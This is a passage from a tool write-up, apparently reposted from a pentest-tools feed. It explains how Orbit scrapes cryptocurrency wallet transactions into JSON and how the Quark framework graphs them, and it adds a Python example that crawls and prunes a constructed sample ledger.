Now orbit will scrape wallets through the blockchain API and once it's done, a json file will be generated.
The next thing is to plot a graph, for which we will be using the quark framework, which is also written by me :D
Clone Quark and navigate to the Quark directory and feed the json file to quark.py as follows:
python quark.py /path/to/file.json
And that's it! Your job is done here; open quark.html to see your graph ^_^

Warning!
The size of nodes (dots) and edges (lines) depends on the transactions made by that address to other members of the scope. So the size of nodes can be ridiculously big, but don't get scared: just click on the stabilize option in the sidebar and leave the rest to quark.
Also, if the node labels are getting in the way, click on the Node Labels option to turn them off.
The last thing is that there are going to be a lot of nodes that aren't interesting, like a wallet that has made only one transaction. Such nodes will just make your graph ugly. To fix this, click on the clean option, which will delete such insignificant nodes. More information about how to interact with the graph can be found in Quark's readme.

Download Orbit
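The depth-limited crawl and the "clean" step described above, as an added example that is not Orbit's or Quark's own code: the blockchain API is replaced by a constructed in-memory ledger behind a hypothetical lookup function, node value is the number of transactions sent to other wallets in scope (what the text says drives node size), and clean() drops wallets involved in only one transaction.

```python
from collections import deque
import json

# Constructed sample ledger: address -> counterparties it sent to
# (a repeated entry means a repeated transaction). Stands in for the
# blockchain API that Orbit scrapes; hypothetical data, not Orbit's own.
SAMPLE_LEDGER = {
    "root": ["a", "b", "a"],
    "a": ["c"],
    "b": ["d", "root"],
    "c": ["e"],
    "d": [],
    "e": ["f"],  # 4 hops from root: only discovered if depth >= 4
    "f": [],
}


def sample_lookup(address):
    """Return outgoing counterparties for an address (empty if unknown)."""
    return SAMPLE_LEDGER.get(address, [])


def crawl(lookup, root, depth=3):
    """Breadth-first crawl of transaction counterparties.

    Wallets up to `depth` hops from `root` are discovered; only wallets
    closer than `depth` hops have their own transactions fetched.
    Returns (nodes, edges) where edges maps (src, dst) -> transaction count.
    """
    nodes = {root}
    edges = {}
    queue = deque([(root, 0)])
    while queue:
        addr, level = queue.popleft()
        if level >= depth:
            continue  # leaf of the crawl: do not expand further
        for peer in lookup(addr):
            edges[(addr, peer)] = edges.get((addr, peer), 0) + 1
            if peer not in nodes:
                nodes.add(peer)
                queue.append((peer, level + 1))
    return nodes, edges


def to_graph(nodes, edges):
    """Build a nodes/edges structure; node value = transactions it sent
    to other members of the scope (what drives node size in the plot)."""
    sent = {n: 0 for n in nodes}
    for (src, _dst), count in edges.items():
        sent[src] += count
    return {
        "nodes": [{"id": n, "value": sent[n]} for n in sorted(nodes)],
        "edges": [{"from": s, "to": d, "value": c}
                  for (s, d), c in sorted(edges.items())],
    }


def clean(graph, keep=()):
    """Drop wallets involved in only one transaction (in or out), plus
    their edges; addresses in `keep` (e.g. the root) always survive."""
    activity = {n["id"]: 0 for n in graph["nodes"]}
    for e in graph["edges"]:
        activity[e["from"]] += e["value"]
        activity[e["to"]] += e["value"]
    keep_ids = {n for n, a in activity.items() if a > 1 or n in keep}
    return {
        "nodes": [n for n in graph["nodes"] if n["id"] in keep_ids],
        "edges": [e for e in graph["edges"]
                  if e["from"] in keep_ids and e["to"] in keep_ids],
    }


if __name__ == "__main__":
    nodes, edges = crawl(sample_lookup, "root", depth=3)
    graph = clean(to_graph(nodes, edges), keep={"root"})
    print(json.dumps(graph, indent=2))
```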

Link: http://feedproxy.google.com/~r/PentestTools/~3/Cm17VA36mFE/orbit-cryptocurrency-wallets.html